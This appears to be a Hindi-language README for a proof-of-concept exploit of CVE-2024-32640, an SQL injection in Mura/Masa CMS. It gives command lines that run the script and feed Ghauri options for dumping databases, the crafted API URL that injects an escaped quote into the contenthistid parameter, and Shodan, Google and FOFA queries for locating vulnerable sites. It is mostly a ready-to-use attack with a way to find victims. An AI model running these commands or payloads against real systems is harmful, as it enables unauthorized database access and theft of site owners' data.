
CVE-2024-32640 | स्वचालित SQLi शोषण PoC
python3 CVE-2024-32640.py --url https://target.com/
Ghauri के साथ उपयोग करने के लिए कोई भी तर्क पार्स करें, उनकी तर्क सूची का पालन करते हुए:
python3 CVE-2024-32640.py --url https://target.com -g "--dbs --current-db"
python3 CVE-2024-32640.py --url https://target.com --ghauri "--dbs --current-db"

उस पता लगाने का उपयोग करते हुए जिसे मैंने टूल में लागू किया है, हम फिर Ghauri में शोषण करने के लिए कमजोर लक्ष्य का उपयोग कर सकते हैं। स्क्रिप्ट इस प्रक्रिया को स्वचालित करती है, Ghauri को कॉल करने के लिए सभी आवश्यक लक्ष्य जानकारी को पार्स करती है।

एक एस्केप सीक्वेंस (%5c) को contenthisid HTML क्वेरी पैरामीटर वैल्यू में जोड़कर, हम यह सत्यापित कर सकते हैं कि लक्ष्य इस SQLi के लिए कमजोर है या नहीं।
सफल शोषण संवेदनशील डेटा तक अनधिकृत पहुंच का कारण बन सकता है।
URL: https://target.com/_api/json/v1/default/?method=processAsyncObject&object=displayregion&contenthistid=x%5c'&previewID=x
Shodan-query: 'Generator: Masa CMS'
Google: "powered by Mura CMS"
FOFA: app="Mura-CMS"
https://twitter.com/HunterMapping/status/1790620695371911388